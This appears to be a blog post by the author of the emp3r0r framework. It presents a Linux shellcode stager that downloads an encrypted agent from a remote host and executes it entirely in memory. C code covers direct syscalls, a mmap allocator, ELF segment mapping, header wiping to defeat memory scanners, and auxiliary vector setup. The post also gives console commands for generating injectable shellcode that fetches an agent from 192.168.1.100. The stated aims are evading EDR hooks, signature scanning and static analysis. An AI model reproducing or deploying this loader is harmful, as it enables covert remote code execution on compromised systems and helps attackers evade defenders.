TL;DR

The source code of this module is available in emp3r0r.

  1. Pure C Shellcode: I implemented a full ELF loader and network stack in C, using direct syscalls to avoid libc dependencies.
  2. True In-Memory: Uses mmap to manually map segments, avoiding memfd_create and disk I/O.
  3. Stealth: Randomizes ELF headers in memory immediately after loading to defeat signature scanning.
  4. Reliability: Implements a custom "Hello/ACK" reliability layer over UDP to ensure payload delivery on unstable networks.

Introducing sRDI for Linux

This is probably the first public implementation of a true "sRDI" equivalent for Linux.

The Linux version of sRDI (Shellcode Reflective ELF Injection) is a shellcode stager I designed to load and execute ELF binaries entirely from memory, bypassing the need for disk writes or standard system loaders.

It downloads an encrypted and compressed ELF binary over the network, decrypts and decompresses it in a user-land heap, and then manually maps and executes it. Crucially, I wrote the entire stager in C to ensure maintainability, yet it compiles down to position-independent shellcode that relies on no external libraries.

What is sRDI?

On Windows, sRDI (Shellcode Reflective DLL Injection) is a staple technique that converts a DLL into position-independent shellcode. This shellcode handles the complex task of loading the DLL from memory—allocating sections, processing relocations, and fixing imports—without ever touching the disk.

My Linux implementation mirrors this philosophy but adapts it to the ELF format. It acts as a lightweight, user-land kernel: it parses segments, maps them to virtual memory, sets up the execution environment (stack and auxiliary vectors), and transfers control.
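
As a rough illustration of the "parses segments" step, here is a minimal sketch that validates a 64-bit ELF image held in a buffer and finds the address range covered by its PT_LOAD segments. The function name `elf_load_range` is hypothetical and is not taken from emp3r0r; the struct and constant names come from the standard `<elf.h>` header.

```c
#include <elf.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Validate a 64-bit ELF image in `buf` and report the lowest and highest
 * virtual addresses covered by its PT_LOAD segments.
 * Returns the number of PT_LOAD segments, or -1 if the image is malformed.
 * (Hypothetical helper for illustration only.)
 */
static int elf_load_range(const uint8_t *buf, size_t len, uint64_t *lo,
                          uint64_t *hi) {
  Elf64_Ehdr eh;
  if (len < sizeof(eh)) return -1;
  memcpy(&eh, buf, sizeof(eh));

  /* Check the \x7fELF magic, the class, and the program header bounds. */
  if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0) return -1;
  if (eh.e_ident[EI_CLASS] != ELFCLASS64) return -1;
  if (eh.e_phentsize != sizeof(Elf64_Phdr)) return -1;
  if (eh.e_phoff > len ||
      (uint64_t)eh.e_phnum * sizeof(Elf64_Phdr) > len - eh.e_phoff)
    return -1;

  int loads = 0;
  *lo = UINT64_MAX;
  *hi = 0;
  for (unsigned i = 0; i < eh.e_phnum; i++) {
    Elf64_Phdr ph;
    memcpy(&ph, buf + eh.e_phoff + (size_t)i * sizeof(ph), sizeof(ph));
    if (ph.p_type != PT_LOAD) continue; /* only loadable segments matter */
    if (ph.p_vaddr < *lo) *lo = ph.p_vaddr;
    if (ph.p_vaddr + ph.p_memsz > *hi) *hi = ph.p_vaddr + ph.p_memsz;
    loads++;
  }
  return loads;
}
```

A loader can use the resulting range to decide how much address space to reserve before mapping the individual segments.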

Why sRDI for Linux?

Linux malware is significantly less advanced than its Windows counterpart. Defenders still look for outdated and easy-to-detect techniques like LD_PRELOAD, memfd_create, and ptrace injection, while advanced in-memory loading techniques are rarely seen in the wild.

To be fair, there is a reason for this: most Linux distributions don't offer a reliable user-mode ABI. The kernel does provide a stable syscall interface, but syscalls are far more limited than the Windows API, which makes it challenging and tedious to implement basic features like encryption, networking, and memory management in pure shellcode.

I wrote this module to demonstrate that it is indeed possible to implement a fully functional sRDI loader for Linux, and to provide a foundation for future Linux in-memory loading techniques.

Key Features

  • True In-Memory Execution: Unlike techniques that rely on memfd_create (which still leaves a file descriptor visible under /proc/<pid>/fd), my loader uses mmap to manually allocate memory and load the ELF segments. This mimics the kernel's binary loader but runs entirely in user space.
  • Diskless: The agent binary never touches the filesystem.
  • Header Randomization: I randomize the ELF header in memory immediately after loading. This neutralizes memory scanners that hunt for the \x7fELF magic bytes to identify injected binaries.
  • Direct Syscalls: The stager uses inline assembly to make direct system calls, removing dependencies on libc and bypassing user-land hooks (such as those installed by LD_PRELOAD-based EDRs).
  • String Obfuscation: Critical strings are XOR-encoded to evade static analysis.
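
To make the string obfuscation point concrete, here is a minimal sketch of in-place XOR encoding. The key value and the function name `xor_buf` are assumptions for illustration; the stager's real key and scheme may differ.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical single-byte key, chosen only for this example. */
#define XOR_KEY 0x5A

/* XOR is its own inverse, so the same routine encodes and decodes in place. */
static void xor_buf(uint8_t *buf, size_t len, uint8_t key) {
  for (size_t i = 0; i < len; i++)
    buf[i] ^= key;
}
```

Strings would be stored encoded in the shellcode and decoded on the stack just before use, so the plaintext never appears in the static blob.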

Implementation Details

To achieve this, I had to solve several major engineering challenges: dependencies, memory management, and the loader logic itself.

Ditch libc, use Syscalls

If you rely on libc, your shellcode won't be portable, and you risk getting hooked by EDRs using LD_PRELOAD. I rewrote the necessary standard library functions (socket, connect, write, mmap) using inline assembly to make direct system calls.

For example, here is my wrapper for socket:

// x86-64 only: syscall number in rax, arguments in rdi, rsi, rdx.
// The syscall instruction itself clobbers rcx and r11.
static inline long syscall3(long n, long a1, long a2, long a3) {
  long ret; // on failure the kernel returns -errno
  __asm__ __volatile__("syscall"
                       : "=a"(ret)
                       : "a"(n), "D"(a1), "S"(a2), "d"(a3)
                       : "rcx", "r11", "memory");
  return ret;
}

int socket(int domain, int type, int protocol) {
  return (int)syscall3(SYS_socket, domain, type, protocol);
}
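
Calls such as mmap take six arguments, so a six-argument variant of the wrapper is also needed. The following is a sketch of what such a wrapper could look like on x86-64 Linux; it is not copied from the emp3r0r source. The one non-obvious detail is that the kernel expects the fourth argument in r10 rather than rcx, which the function-call ABI would use.

```c
#include <sys/syscall.h> /* SYS_* numbers only; no libc functions are called */

/* x86-64 Linux only: arguments 4-6 travel in r10, r8 and r9. */
static inline long syscall6(long n, long a1, long a2, long a3,
                            long a4, long a5, long a6) {
  long ret;
  /* Pin the extra arguments to the registers the kernel reads them from. */
  register long r10 __asm__("r10") = a4;
  register long r8 __asm__("r8") = a5;
  register long r9 __asm__("r9") = a6;
  __asm__ __volatile__("syscall"
                       : "=a"(ret)
                       : "a"(n), "D"(a1), "S"(a2), "d"(a3),
                         "r"(r10), "r"(r8), "r"(r9)
                       : "rcx", "r11", "memory");
  return ret; /* values in [-4095, -1] are -errno */
}
```

Because there is no libc in between, errors come back as negative errno values in the return register instead of through the errno variable.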

Manual Memory Management

Since I can't use malloc (it's part of libc), I implemented a stateless allocator on top of SYS_mmap (syscall 9 on x86-64). Every allocation is its own anonymous mapping, which lets the stager manage heap memory for downloading, decrypting, and decompressing the payload dynamically.

void *malloc(size_t size) {
  // Reserve room for a size header in front of the user data
  size_t total_size = size + sizeof(size_t);
  long ret = syscall6(SYS_mmap, 0, total_size, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (ret < 0) return NULL; // raw syscalls return -errno on failure

  void *ptr = (void *)ret;
  *(size_t *)ptr = size; // Store size for free()
  return (uint8_t *)ptr + sizeof(size_t);
}

Mapping and Header Randomization

The core of the module is elf_loader.c. It mimics the kernel's binary loader but runs in userland. I iterate through the PT_LOAD segments of the ELF binary and map them into memory at the correct virtual addresses.

Crucially, to evade memory scanners that look for the \x7fELF header magic, I randomize the header immediately after mapping the first segment. This breaks the signature while keeping the segment valid for execution.

    // Map the segment
    void *m = (void *)mmap((void *)(base + map_start), map_size,
                           PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

    // Copy segment data (only p_filesz bytes; the rest of the anonymous
    // mapping stays zero-filled, which covers .bss)
    memcpy((char *)base + phdr[x].p_vaddr, elf_start + phdr[x].p_offset,
           phdr[x].p_filesz);

    // Wipe ELF header if it's in this segment using random bytes
    if (phdr[x].p_offset == 0) {
      size_t wipe_size = sizeof(Elf_Ehdr);
      if (hdr->e_phoff < wipe_size)
        wipe_size = hdr->e_phoff;
      _get_rand((char *)base + phdr[x].p_vaddr, wipe_size);
    }
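
The excerpt uses map_start and map_size without showing how they are derived. Since MAP_FIXED needs a page-aligned address, one plausible derivation is sketched below, together with a helper that translates segment flags into protection bits for a later mprotect call. Both helper names, the 4 KiB page size, and the idea that permissions are tightened afterwards are assumptions, not details confirmed by the source.

```c
#include <elf.h>
#include <stdint.h>
#include <sys/mman.h>

#define PAGE_SIZE_ASSUMED 4096UL /* assumption: 4 KiB pages */

/* Round a PT_LOAD segment outwards to page boundaries. */
static void segment_span(const Elf64_Phdr *ph, uint64_t *map_start,
                         uint64_t *map_size) {
  uint64_t start = ph->p_vaddr & ~(PAGE_SIZE_ASSUMED - 1);
  uint64_t end = (ph->p_vaddr + ph->p_memsz + PAGE_SIZE_ASSUMED - 1) &
                 ~(PAGE_SIZE_ASSUMED - 1);
  *map_start = start;
  *map_size = end - start;
}

/* Translate ELF segment flags (PF_*) into mmap/mprotect protection bits. */
static int segment_prot(const Elf64_Phdr *ph) {
  int prot = 0;
  if (ph->p_flags & PF_R) prot |= PROT_READ;
  if (ph->p_flags & PF_W) prot |= PROT_WRITE;
  if (ph->p_flags & PF_X) prot |= PROT_EXEC;
  return prot;
}
```

Mapping read-write first and switching to the final permissions after the copy avoids ever needing a writable and executable mapping at the same time.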

Stack Setup & Auxiliary Vector

You can't just jump to the entry point. Modern binaries (especially those built with Go or glibc) expect the kernel to provide specific information in the Auxiliary Vector (Auxv) during startup. A naive loader that skips this will cause the payload to crash immediately.

I manually construct the process stack, specifically populating AT_RANDOM (required for stack canaries), AT_PHDR, and AT_ENTRY.

  // AT_RANDOM: Address of 16 random bytes (crucial for glibc security features)
  at[cnt].id = AT_RANDOM;
  at[cnt++].value = (size_t)rand_bytes;

  // AT_PHDR: Address of program headers
  at[cnt].id = AT_PHDR;
  at[cnt++].value = (size_t)(elf_base + hdr->e_phoff);
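
For context, the auxiliary vector is only the last part of the initial stack image. A minimal sketch of the full layout a 64-bit payload expects at its entry point is shown below: argc, the argv pointers, a NULL, the envp pointers, a NULL, and then the auxv pairs ending with AT_NULL. The function name `build_stack_image` is hypothetical, and the sketch writes into a plain array rather than a real stack.

```c
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Write the initial stack image into `out`, lowest address first:
 *   argc, argv[0..argc-1], NULL, envp[...], NULL, auxv pairs..., AT_NULL
 * Returns the number of words written, or 0 if `cap` is too small.
 * (Hypothetical helper; assumes a 64-bit target.)
 */
static size_t build_stack_image(uintptr_t *out, size_t cap, int argc,
                                char **argv, char **envp,
                                const Elf64_auxv_t *auxv, size_t naux) {
  size_t nenv = 0;
  while (envp && envp[nenv]) nenv++;

  size_t need = 1 + (size_t)argc + 1 + nenv + 1 + 2 * (naux + 1);
  if (need > cap) return 0;

  size_t i = 0;
  out[i++] = (uintptr_t)argc;
  for (int a = 0; a < argc; a++) out[i++] = (uintptr_t)argv[a];
  out[i++] = 0; /* argv terminator */
  for (size_t e = 0; e < nenv; e++) out[i++] = (uintptr_t)envp[e];
  out[i++] = 0; /* envp terminator */
  for (size_t x = 0; x < naux; x++) {
    out[i++] = (uintptr_t)auxv[x].a_type;
    out[i++] = (uintptr_t)auxv[x].a_un.a_val;
  }
  out[i++] = AT_NULL; /* terminator pair: type AT_NULL, value 0 */
  out[i++] = 0;
  return i;
}
```

When this image is copied onto a real stack, the stack pointer handed to the entry point must point at the argc word and, on x86-64, be 16-byte aligned.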

Constructor Execution

Before handing over control to the payload, a proper loader must execute the binary's constructors (functions marked with __attribute__((constructor)) or located in .init sections).

My loader parses the .init and .init_array sections and sequentially executes these functions. This ensures that the runtime environment of the payload is fully initialized.

  // Let's run the constructors
  Elf_Shdr *init = _get_section(".init", buf);
  Elf_Shdr *init_array = _get_section(".init_array", buf);

  if (init) {
    // Cast the computed address, not just base, to a function pointer
    ptr = (int (*)(int, char **, char **))(base + init->sh_addr);
    ptr(argc, argv, env);
  }
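
The excerpt stops after .init, so here is a sketch of how the .init_array half could be handled. The section is simply an array of function pointers, and glibc's convention is to call each one with (argc, argv, envp). The function `run_init_array` and the two demo constructors are hypothetical, and the sketch assumes the array entries already hold absolute runtime addresses (a non-PIE binary, or relocations already applied).

```c
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

typedef void (*init_fn)(int, char **, char **);

/*
 * Call every entry of .init_array in order and return how many ran.
 * Assumes entries are absolute runtime addresses (see lead-in).
 */
static size_t run_init_array(uintptr_t base, const Elf64_Shdr *sh, int argc,
                             char **argv, char **envp) {
  init_fn *fns = (init_fn *)(base + sh->sh_addr);
  size_t count = sh->sh_size / sizeof(init_fn);
  for (size_t i = 0; i < count; i++)
    fns[i](argc, argv, envp);
  return count;
}

/* Demo constructors (hypothetical) that record the order they ran in. */
static int demo_order[2];
static int demo_calls;

static void demo_ctor_a(int argc, char **argv, char **envp) {
  (void)argc; (void)argv; (void)envp;
  demo_order[demo_calls++] = 1;
}

static void demo_ctor_b(int argc, char **argv, char **envp) {
  (void)argc; (void)argv; (void)envp;
  demo_order[demo_calls++] = 2;
}
```

Order matters here: constructors may depend on state set up by earlier ones, so the array is walked front to back.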

In Action

You can find this module in the emp3r0r console.

use shellcode_stager
set LISTENER_TYPE TCP
set DOWNLOAD_HOST 192.168.1.100
set DOWNLOAD_PORT 8080
set DOWNLOAD_KEY my_secret_key
run

This generates a position-independent shellcode blob. You can inject it into any process, and it will bootstrap itself, download your agent, and run it entirely from memory.

